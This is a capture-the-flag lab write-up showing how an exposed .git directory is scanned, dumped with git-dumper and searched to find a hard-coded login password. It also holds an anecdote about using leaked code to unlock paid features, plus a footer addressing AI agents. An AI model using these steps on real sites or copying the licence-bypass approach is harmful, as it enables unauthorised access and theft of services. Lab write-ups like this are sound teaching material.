> For the complete documentation index, see [llms.txt](https://dmdhrumilmistry.gitbook.io/home/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://dmdhrumilmistry.gitbook.io/home/blog/tryhackme-writeups/git-happens.md).

# Git-Happens

### Target Details

IP Address: 10.10.49.172

### Scan Services

* Run nmap scan

```bash
$ nmap -sCV -Pn -oN nmap.txt [TARGET_IP]
$ cat nmap.txt
Nmap scan report for [TARGET_IP]
Host is up (0.40s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-title: Super Awesome Site!
|_http-server-header: nginx/1.14.0 (Ubuntu)
| http-git: 
|   [TARGET_IP]:80/.git/
|     Git repository found!
|_    Repository description: Unnamed repository; edit this file 'description' to name the...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Apr 14 22:04:47 2023 -- 1 IP address (1 host up) scanned in 118.95 seconds
```

* Services

| Service | PORT | Comments                                    |
| ------- | ---- | ------------------------------------------- |
| HTTP    | 80   | exposed .git directory with listing enabled |

<figure><img src="/files/edB4UWro0UhT8Y2z8k16" alt=""><figcaption><p>Exposed .git directory</p></figcaption></figure>

### Clone git directory to local machine

* Install git-dumper python tool

```bash
pip install git-dumper
```

* Create directory for repo and change dir

```bash
mdkir git-repo && cd git-repo
```

* Download git files

```bash
$ git-dumper http://10.10.49.172/.git/ .
[-] Testing http://10.10.49.172/.git/HEAD [200]
[-] Testing http://10.10.49.172/.git/ [200]
[-] Fetching .git recursively
[-] Fetching http://10.10.49.172/.git/ [200]
[-] Fetching http://10.10.49.172/.gitignore [404]
[-] http://10.10.49.172/.gitignore responded with status code 404
[-] Fetching http://10.10.49.172/.git/description [200]
[-] Fetching http://10.10.49.172/.git/index [200]
[-] Fetching http://10.10.49.172/.git/hooks/ [200]
[-] Fetching http://10.10.49.172/.git/refs/ [200]
[-] Fetching http://10.10.49.172/.git/config [200]
[-] Fetching http://10.10.49.172/.git/branches/ [200]
[-] Fetching http://10.10.49.172/.git/HEAD [200]
....
[-] Fetching http://10.10.49.172/.git/logs/refs/heads/master [200]
[-] Running git checkout .
Updated 7 paths from the index
```

### Looking Through commits

* Check commit logs

```bash
$ git log
commit d0b3578a628889f38c0affb1b75457146a4678e5 (HEAD -> master, tag: v1.0)
Author: Adam Bertrand <hydragyrum@gmail.com>
Date:   Thu Jul 23 22:22:16 2020 +0000

    Update .gitlab-ci.yml

commit 77aab78e2624ec9400f9ed3f43a6f0c942eeb82d
Author: Hydragyrum <hydragyrum@gmail.com>
Date:   Fri Jul 24 00:21:25 2020 +0200

    add gitlab-ci config to build docker file.

....


commit 395e087334d613d5e423cdf8f7be27196a360459
Author: Hydragyrum <hydragyrum@gmail.com>
Date:   Thu Jul 23 23:17:43 2020 +0200

    Made the login page, boss!

commit 2f423697bf81fe5956684f66fb6fc6596a1903cc
Author: Adam Bertrand <hydragyrum@gmail.com>
Date:   Mon Jul 20 20:46:28 2020 +0000

    Initial commit
```

* Found commit hash when login page was created. commit hash: 395e087334d613d5e423cdf8f7be27196a360459
* Change git HEAD to 395e087334d613d5e423cdf8f7be27196a360459 hash

```bash
git checkout 395e087334d613d5e423cdf8f7be27196a360459
```

* List directory files

```bash
$ ls
README.md      css            dashboard.html index.html
```

* We might find hard coded passwords in html page.

```bash
$ cat index.html

....
    <script>
      function login() {
        let form = document.getElementById("login-form");
        console.log(form.elements);
        let username = form.elements["username"].value;
        let password = form.elements["password"].value;
        if (
          username === "admin" &&
          password === "{{REDACTED}}"
        ) {
          document.cookie = "login=1";
          window.location.href = "/dashboard.html";
        } else {
          document.getElementById("error").innerHTML =
            "INVALID USERNAME OR PASSWORD!";
        }
      }
    </script>
  </body>
</html> 
```

* We've found hard coded password in index.html page. Submit password as flag.

### Real World Analogy

From one of the open source project. The developers mistakenly commited paid services code block on their community edition git repo. I was able to reverse engineer the code block and avail those premium services :wink: by making changes to the community edition codebase.

### Conclusion

That was FUN!!

* If you're gonna hard code credentials on client side, there is always someone who's gonna break the code.&#x20;
* `.git` directory shouldn't be accessible to anyone. A minor server misconfiguration will allow attacker to find attack vector and exploit your infra/apps.&#x20;


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://dmdhrumilmistry.gitbook.io/home/blog/tryhackme-writeups/git-happens.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.